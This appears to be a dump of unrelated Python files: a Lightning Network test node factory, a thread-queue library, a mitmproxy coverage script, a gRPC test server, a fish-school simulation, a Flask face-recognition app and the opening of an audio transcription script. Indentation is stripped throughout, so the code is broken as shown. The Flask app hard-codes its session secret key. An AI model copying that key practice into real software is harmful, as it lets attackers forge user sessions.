self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount, announce=announce_channel)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
def wait_for_htlcs(self):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
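    # Hedged example (matches the default feerates used by NodeFactory.get_node
    # further below): node.set_feerates((15000, 7500, 3750)) mocks the
    # CONSERVATIVE/2, ECONOMICAL/4 and ECONOMICAL/100 estimatesmartfee answers.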
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory, db_provider, node_cls):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip'
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, **kwargs):
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, db=db,
port=port, options=options, **kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start(wait_for_bitcoind_sync)
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*openingd-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
thread_queue.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
from threading import Thread
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
__author__ = 'Tim Martin'
__email__ = 'tim@timmartin.me'
__version__ = '0.2.2'
LOG = logging.getLogger(__name__)
class QueueNotEmptyException(Exception):
"""
Raised when items from the queue have not
been processed, likely due to an error in
the underlying threads
"""
def __init__(self, message, items, exceptions):
self._unattempted_tasks = items
self.thread_exceptions = exceptions
super(QueueNotEmptyException, self).__init__(message)
@property
def all_unprocessed_tasks(self):
tasks = list(self.unattempted_tasks)
thread_task_excs = [exc.task for exc in self.thread_exceptions
if isinstance(exc, ThreadTaskException) and exc.task is not None]
return tasks + thread_task_excs
@property
def unattempted_tasks(self):
return [task for task in self._unattempted_tasks if task is not None]
class ThreadTaskException(Exception):
"""
Wrapper for exceptions that occur within the
underlying threads
"""
def __init__(self, message, exc, task=None):
self.__cause__ = exc
self.task = task
super(ThreadTaskException, self).__init__(message)
class ThreadQueue(object):
"""
An object for safely processing a queue
using a fixed number of threads
Example:
..code-block:: python
from thread_queue import ThreadQueue
def worker(arg, keyword=5):
print('arg = {0}, keyword = {1}'.format(arg, keyword))
with ThreadQueue(worker) as tq:
for i in range(10):
tq.load(i, i*10)
# Would print in no particular order (because it's threaded)
# arg = 0, keyword = 0
# arg = 1, keyword = 10
# arg = 2, keyword = 20
# ...
# arg = 9, keyword = 90
"""
def __init__(self, worker,
thread_count=10,
initialize_thread=None,
initialization_args=None,
initialization_kwargs=None,
cleanup_thread=None,
queue=None,
response_queue=None):
"""
:param function worker: The function to call from the
generated threads. This will take the same arguments
as are added to the ``ThreadQueue.load`` method. If you
call ``ThreadQueue(my_job).load(1, keyword=2)`` this
function would be effectively equivalent to calling
``my_job(1, keyword=2)``. The one caveat is if
``initialize_thread`` is set. In that case the return
value will be prepended to the arguments.
``ThreadQueue(my_job, initialize_thread=lambda: 'initial').load(1, keyword=2)``
            is equivalent to ``my_job('initial', 1, keyword=2)``.
:param int thread_count: The number of threads to instantiate
:param function initialize_thread: A function to call immediately
after a thread has been initialized. The return value will
be prepended to the args sent to worker
:param tuple initialization_args: Arguments to pass to the ``initialize_thread``
function
:param dict initialization_kwargs: Keyword arguments to pass to
``initialize_thread``
:param function cleanup_thread: Called when the thread is about
to finish. It will always be called even in the event of an exception.
If ``initialize_thread`` is set, then the return value of that function
will be passed to ``cleanup_thread``
:param Queue queue: Defaults to ``queue.Queue()``. An
object that implements a ``Queue`` like interface.
It must include at least ``get``, ``put``, and ``join``
methods.
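        :param Queue response_queue: Defaults to ``queue.Queue()``. Each worker's
            return value is put on this queue.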
"""
self.thread_count = thread_count
self._queue = queue or Queue()
        self.response_queue = response_queue or Queue()
self._exc_queue = None
self.initialize_thread = initialize_thread
self.worker = worker
self.initialization_args = initialization_args or []
self.initialization_kwargs = initialization_kwargs or {}
self.cleanup_thread = cleanup_thread
self._threads = []
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def start(self):
"""
Initializes the threads that the queue will be using
"""
LOG.debug('Starting ThreadQueue threads')
self._exc_queue = Queue()
for i in range(self.thread_count):
worker_args = [self._queue, self.initialize_thread,
self.worker, self.initialization_args,
self.initialization_kwargs, self.cleanup_thread,
self._exc_queue, self.response_queue]
thread = Thread(target=_do_work, args=worker_args)
thread.start()
self._threads.append(thread)
def load(self, *args, **kwargs):
"""
Loads a set of arguments to pass to the threads
via the queue. The arguments will be passed to
the ``worker`` function exactly as specified here unless
        ``initialize_thread`` is set, in which case the return
        value from ``initialize_thread`` will be prepended to the arguments.
:param tuple args:
:param dict kwargs:
"""
self._queue.put(tuple([args, kwargs]))
def close(self):
"""
Waits for the queue to empty and then
joins the threads
"""
for i in range(self.thread_count):
self._queue.put(None)
for thread in self._threads:
thread.join()
unfinished_tasks = empty_queue(self._queue)
thread_errors = empty_queue(self._exc_queue)
if unfinished_tasks or thread_errors:
raise QueueNotEmptyException('The ThreadQueue did not finish all tasks',
unfinished_tasks, thread_errors)
LOG.debug('Closed all ThreadQueue threads')
def empty_queue(queue):
"""
:param Queue queue:
:return:
:rtype: list
"""
all_items = []
while True:
try:
all_items.append(queue.get_nowait())
except Empty:
return all_items
def _do_work(q, initialize_thread, worker, args, kwargs, cleanup_thread, exc_queue, response_queue):
try:
extra = None
if initialize_thread:
LOG.debug('Initializing thread')
extra = initialize_thread(*args, **kwargs)
else:
LOG.debug('Skipping thread initialization')
try:
_worker_loop(q, worker, response_queue,
extra=extra, has_extra=initialize_thread is not None)
finally:
if cleanup_thread is not None:
LOG.debug('Cleaning up thread')
if initialize_thread:
cleanup_thread(extra)
else:
cleanup_thread()
except Exception as exc:
LOG.warning('Exception in ThreadQueue thread', exc_info=True)
exc_queue.put(exc)
raise
def _worker_loop(queue, worker, response_queue, extra=None, has_extra=False):
while True:
item = queue.get()
try:
if item is None:
LOG.debug('Found break request from parent. Finishing work')
break
LOG.debug('Beginning task')
if has_extra:
resp = worker(extra, *item[0], **item[1])
else:
resp = worker(*item[0], **item[1])
response_queue.put(resp)
LOG.debug('Finished task')
queue.task_done()
except Exception as exc:
raise ThreadTaskException('An exception occurred while processing a task',
exc, task=item)
|
individual_coverage.py
|
#!/usr/bin/env python3
import io
import contextlib
import os
import sys
import glob
import multiprocessing
import configparser
import itertools
import pytest
def run_tests(src, test, fail):
stderr = io.StringIO()
stdout = io.StringIO()
with contextlib.redirect_stderr(stderr):
with contextlib.redirect_stdout(stdout):
e = pytest.main([
'-qq',
'--disable-pytest-warnings',
'--cov', src.replace('.py', '').replace('/', '.'),
'--cov-fail-under', '100',
'--cov-report', 'term-missing:skip-covered',
'-o', 'faulthandler_timeout=0',
test
])
if e == 0:
if fail:
print("FAIL DUE TO UNEXPECTED SUCCESS:", src, "Please remove this file from setup.cfg tool:individual_coverage/exclude.")
e = 42
else:
print(".")
else:
if fail:
print("Ignoring allowed fail:", src)
e = 0
else:
cov = [l for l in stdout.getvalue().split("\n") if (src in l) or ("was never imported" in l)]
if len(cov) == 1:
print("FAIL:", cov[0])
else:
                print("FAIL:", src, test, stdout.getvalue())
print(stderr.getvalue())
print(stdout.getvalue())
sys.exit(e)
def start_pytest(src, test, fail):
# run pytest in a new process, otherwise imports and modules might conflict
proc = multiprocessing.Process(target=run_tests, args=(src, test, fail))
proc.start()
proc.join()
return (src, test, proc.exitcode)
def main():
c = configparser.ConfigParser()
c.read('setup.cfg')
fs = c['tool:individual_coverage']['exclude'].strip().split('\n')
no_individual_cov = [f.strip() for f in fs]
excluded = ['mitmproxy/contrib/', 'mitmproxy/test/', 'mitmproxy/tools/', 'mitmproxy/platform/']
src_files = glob.glob('mitmproxy/**/*.py', recursive=True)
src_files = [f for f in src_files if os.path.basename(f) != '__init__.py']
src_files = [f for f in src_files if not any(os.path.normpath(p) in f for p in excluded)]
ps = []
for src in sorted(src_files):
test = os.path.join("test", os.path.dirname(src), "test_" + os.path.basename(src))
if os.path.isfile(test):
ps.append((src, test, src in no_individual_cov))
result = list(itertools.starmap(start_pytest, ps))
if any(e != 0 for _, _, e in result):
sys.exit(1)
if __name__ == '__main__':
main()
|
grpcserver.py
|
import grpc
from concurrent import futures
from google.protobuf import json_format
import threading
import base64
def grpc_server(pb2, pb2_grpc):
class OpenapiServicer(pb2_grpc.OpenapiServicer):
def __init__(self):
super(OpenapiServicer, self).__init__()
def SetConfig(self, request, context):
response_400 = """
{
"status_code_400" : {
"errors" : ["invalid value"]
}
}
"""
response_200 = """
{
"status_code_200" : "%s"
}
""" % base64.b64encode(
b"success"
).decode(
"utf-8"
)
test = request.prefix_config.l.integer
if test is not None and (test < 10 or test > 90):
res_obj = json_format.Parse(response_400, pb2.SetConfigResponse())
else:
res_obj = json_format.Parse(response_200, pb2.SetConfigResponse())
return res_obj
def start(self):
self._web_server_thread = threading.Thread(target=local_web_server)
            self._web_server_thread.daemon = True
self._web_server_thread.start()
return self
def local_web_server():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
pb2_grpc.add_OpenapiServicer_to_server(OpenapiServicer(), server)
print("Starting server. Listening on port 50051.")
server.add_insecure_port("[::]:50051")
server.start()
return OpenapiServicer()
|
turing_learning.py
|
import numpy as np
import matplotlib.pyplot as plt
import threading
import math
from channel import Channel
from environment import Environment
from replica_fish import ReplicaFish
from DelightFish import Fish
from observer import Observer
from utils import generate_distortion, generate_fish, generate_replica_fish, generate_all_fish, run_simulation
from interaction import Interaction
def test_simulation(
fish,
observer,
run_time=5,
):
"""Run a simulation and format data from it for use by classifiers
Arguments:
fish {list} -- List of fish instances
observer {Observer} -- Observer instance
Keyword Arguments:
run_time {number} -- Total run time in seconds (default: {5})
"""
def stop():
for f in fish:
f.stop()
observer.stop()
# Start the fish
fish_threads = []
for f in fish:
threading.Thread(target=f.start).start()
observer_thread = threading.Thread(target=observer.start)
observer_thread.start()
# Wait for the simulation to end, so data can be collected
# from the observer
fish_matrixes = []
threading.Timer(run_time, stop).start()
observer_thread.join()
# merge each fish's linear speed, angular speed, and neighbor
# distances into a single matrix. This will
    # ultimately be an N x (N + 1) matrix, where N is the number
# of fish.
for fish_index in range(observer.num_nodes):
single_fish = np.column_stack((observer.lin_speed[fish_index],
observer.ang_speed[fish_index],
observer.neighbor_distances[fish_index]))
fish_matrixes.append(single_fish)
return np.stack(fish_matrixes, axis = 0)
def run_full_test(weights,
conn_threshold,
run_time,
total_fish,
k_ar,
max_speed,
arena_size,
real = False):
"""
Start and run a simulation and collect data for Turing Learning. This function
initializes other objects needed for simulation, rather than just
starting and stopping everything
Arguments:
weights {float|list} --- weights used by Neural Network in imposter fish
conn_threshold {float} -- Distance at which fish can no longer detect other fish
run_time {int} -- Length of time to run simulation
total_fish {int} -- Number of fish to be in the school
k_ar {float} -- parameter for delight fish
max_speed {float} -- Max speed of a single fish
arena_size {int} -- boundaries of arena to create distortion
real {bool} -- Should this test have real or imposter fish (default : {False})
"""
arena_center = arena_size / 2.0
initial_spread = 20
fish_pos = initial_spread * np.random.rand(total_fish, 2) + arena_center - initial_spread / 2.0
clock_freqs = 1
verbose = False
distortion = generate_distortion(type='none', n=arena_size)
environment = Environment(
node_pos=fish_pos,
distortion=distortion,
prob_type='binary',
noise_magnitude=0,
conn_thres=conn_threshold,
verbose=verbose
)
interaction = Interaction(environment, verbose=verbose)
channel = Channel(environment)
# Have all real or all fake
if real:
n_fish = total_fish
n_replica_fish = 0
else:
n_fish = 0
n_replica_fish = total_fish
fish = generate_all_fish(
n_fish=n_fish,
n_replica_fish= n_replica_fish,
channel=channel,
interaction=interaction,
k_coh = 0,
k_ar = k_ar,
alpha = 40,
weights = weights,
lim_neighbors=[0, math.inf],
neighbor_weights=1.0,
fish_max_speeds=max_speed,
clock_freqs=clock_freqs,
verbose=verbose
)
channel.set_nodes(fish)
observer = Observer(fish=fish, environment=environment, channel=channel)
fish_matrix = test_simulation(fish=fish, observer=observer, run_time=run_time)
return fish_matrix
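# Hedged usage sketch; `candidate_weights` is a hypothetical variable and the
# remaining values are illustrative only:
#   data = run_full_test(weights=candidate_weights, conn_threshold=30, run_time=5,
#                        total_fish=8, k_ar=0.1, max_speed=9, arena_size=300,
#                        real=False)
#   # `data` is the per-fish matrix stack built by test_simulation above.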
|
app.py
|
import db
import threading
import configparser
import detected
import json
from facerec import capture_faces
from flask import Flask, flash, redirect, render_template, request, jsonify
from time import sleep
from helpers import f_encode, camtest, init_db
from PIL import Image, ImageOps
from io import BytesIO
# Configure application
app = Flask(__name__)
app.secret_key = "kdug4fuergdffkhsgdgd"
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# DEFINE GLOBAL VARIABLES
# Get lists of known face encodings and ids from database
facelist = db.getfacelist()
idlist = db.getidlist()
# Reset shared global variables
detected.total_faces = 0
detected.face_ids.clear()
# make sure camera is configured "off"
config = configparser.ConfigParser()
config.read("config.ini")
config["facerec"]["active"] = "no"
with open("config.ini", "w") as f:
config.write(f)
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
@app.route("/", methods=["GET", "POST"])
def index():
""" Main Page """
# Get capture_faces status from .ini file
config.read("config.ini")
capture_active = config["facerec"].getboolean("active")
if request.method == "POST":
# Activate / deactivate capture_faces on button push
if request.form.get("on_off"):
on_off = request.form.get("on_off")
if on_off == "True":
config["facerec"]["active"] = "yes"
with open("config.ini", "w") as f:
config.write(f)
# Flash message
flash("Face recognition activated")
# Start capture_faces thread
capturethread = threading.Thread(target=capture_faces, args=(facelist, idlist))
capturethread.start()
#sleep(3)
elif on_off == "False":
# Change config to end capture_faces thread
config["facerec"]["active"] = "no"
with open("config.ini", "w") as f:
config.write(f)
# Flash message
flash("Face recognition deactivated")
sleep(2)
return redirect("/")
else:
return render_template("index.html", capture_active = capture_active)
@app.route("/no_of_faces")
def no_of_faces():
""" Return current number of faces detected """
return jsonify(faces = detected.total_faces)
@app.route("/people")
def people():
""" Return names of people detected """
namedict = {}
for id in detected.face_ids:
if not id == 0:
name = db.getname(id)
namedict[id]=name
return jsonify(namedict)
@app.route("/faces", methods=["GET", "POST"])
def faces():
""" Face Management """
global facelist
global idlist
if request.method == "POST":
# --- Adding a new face ---
if "add" in request.form:
# Verify name input
if not request.form.get("name"):
flash("Must provide name")
return redirect("/faces")
else:
name = request.form.get("name")
# Verify file was submitted
if not request.files["file"]:
flash("Must provide image file")
return redirect("/faces")
else:
try:
f = request.files["file"]
except:
flash("Error uploading file")
return redirect("/faces")
# Resize and rotate Image
try:
print("Processing Image...")
img = Image.open(f)
try:
#rotate accordingly
img = ImageOps.exif_transpose(img)
except:
pass
img.thumbnail((800, 800))
temp = BytesIO()
img.save(temp, format="png")
except:
flash("Error processing image")
return redirect("/faces")
# Try to generate face encoding
try:
facecode = f_encode(temp)
except:
flash("Invalid image file or could not detect any faces")
return redirect("/faces")
# Add new entry to database
try:
db.add(name, facecode)
except:
flash("Database error")
return redirect("/faces")
else:
flash("New face entry added")
# Update global lists of known face encodings and ids from database
facelist = db.getfacelist()
idlist = db.getidlist()
return redirect("/faces")
# --- Removing a face entry ---
elif "remove" in request.form:
# Get Id to remove
id = request.form.get("remove")
# Remove Id from database
try:
db.remove(id)
except:
flash("Error removing face from database")
return redirect("/faces")
else:
flash("Face entry removed from database")
# Update global lists of known face encodings and ids from database
facelist = db.getfacelist()
idlist = db.getidlist()
return redirect("/faces")
# --- Initialize Database ---
elif "initialize" in request.form:
return redirect("/initdb")
return redirect("/")
else:
users = []
users = db.getidnamelist()
return render_template("faces.html", users = users)
@app.route("/initdb", methods=["GET", "POST"])
def initdb():
""" Initialize DB """
global facelist
global idlist
if request.method == "POST":
if "cancel" in request.form:
return redirect("/faces")
elif "initialize" in request.form:
try:
init_db()
except:
flash("Error trying to initialize the database")
return redirect("/initdb")
else:
# Update global lists of known face encodings and ids from database
facelist = db.getfacelist()
idlist = db.getidlist()
flash("Database initialized")
return redirect("/faces")
else:
return render_template("initdb.html")
@app.route("/settings", methods=["GET", "POST"])
def settings():
""" Settings """
if request.method == "POST":
# --- Save settings to config.ini ---
if "save" in request.form:
config["picam"]["resolution_x"] = request.form.get("resolution_x")
config["picam"]["resolution_y"] = request.form.get("resolution_y")
config["picam"]["rotation"] = request.form.get("rotation")
config["picam"]["hflip"] = request.form.get("hflip")
with open("config.ini", "w") as f:
config.write(f)
flash("Camera settings saved")
return redirect("/settings")
# --- Run camera preview ---
elif "test" in request.form:
camtest()
return redirect("/settings")
else:
return redirect("/settings")
else:
# Read Pi Cam settings
config.read("config.ini")
camcfg = {}
for name,value in config.items("picam"):
camcfg[name] = value
print(camcfg)
return render_template("settings.html", cam = camcfg)
if __name__ == "__main__":
app.run()
|
audio_transcribe.py
|
# Audio Transcriptor
# This script will create the folder structure in the same manner as the LJSpeech-1.1 dataset.
# This script will split the audio files on silences and send the audio chunks to the Google recognition service.
# Google will return the recognized text.
# This text will be written to metadata.csv in the same manner as in the LJSpeech-1.1 dataset.
# The audio chunks will also be saved in the same manner as in the LJSpeech-1.1 dataset.
# This script must be in the same folder as the audio files that should be transcribed.
# The names of the audio files must be as follows: 01.mp3, 02.mp3, ..., 99.mp3 (or) 01.wav, 02.wav, ..., 99.wav
# To work with mp3-files you will need to install ffmpeg and put it to PATH.
# Windows instruction here http://blog.gregzaal.com/how-to-install-ffmpeg-on-windows/
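# Illustrative invocation (the paths are placeholders), matching the argparse interface in main() below,
# which expects one sub-folder per speaker/author inside the input directory:
#   python audio_transcribe.py ./raw_audio ./dataset_out
# Each metadata.csv line has the form <chunk file name>|<transcription>|<transcription>
# (plus the symbol rate and the chunk length in ms when SYMBOLS_GATE is enabled).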
import argparse
import json
import logging
import sys
from multiprocessing import Semaphore, Process
from pathlib import Path
import speech_recognition as sr
from pydub import AudioSegment, effects
from pydub.silence import split_on_silence
from bert.bert_punctuation import BertPunctuation # https://github.com/vlomme/Bert-Russian-punctuation don't forget to download pretrained bert model https://drive.google.com/file/d/190dLqhRjqgNJLKBqz0OxQ3TzxSm5Qbfx/view
from normalizer.normalizer import Normalizer # https://github.com/snakers4/russian_stt_text_normalization
# Settings
SOURCE_FORMAT = 'mp3' # or 'wav'; format of the source audio files.
SYMBOLS_GATE = False # only chunks with a normal symbol rate (symbols per second) will be used
SYMBOL_RATE_MIN = 13 # min number of symbols per second of audio
SYMBOL_RATE_MAX = 30 # max number of symbols per second of audio
ADDITIONAL_CLEAN = True # before use, each chunk is sent to the Google cloud; if Google cannot recognize any words in it, the chunk is discarded. True consumes additional time.
MIN_SILENCE_LEN = 300 # silence duration used for cutting, in ms. If the speaker stays silent for longer, increase this value; otherwise decrease it.
SILENCE_THRESH = -36 # consider it silent if quieter than -36 dBFS. Adjust this per requirement.
KEEP_SILENCE = 100 # keep some ms of leading/trailing silence.
FRAME_RATE = 16000 # frame rate of the resulting audio.
TARGET_LENGTH = 1000 # min target length of the output audio files, in ms.
PUNCTUATION = False # adds commas to the text. Set it to False if you use a language other than Russian.
PROCESSES_NUM = 5 # number of parallel processes
LOG_DIR = Path(__file__).parent / 'logs'
LOG_DIR.mkdir(exist_ok=True)
PROGRESS_FILE = Path('progress.json')
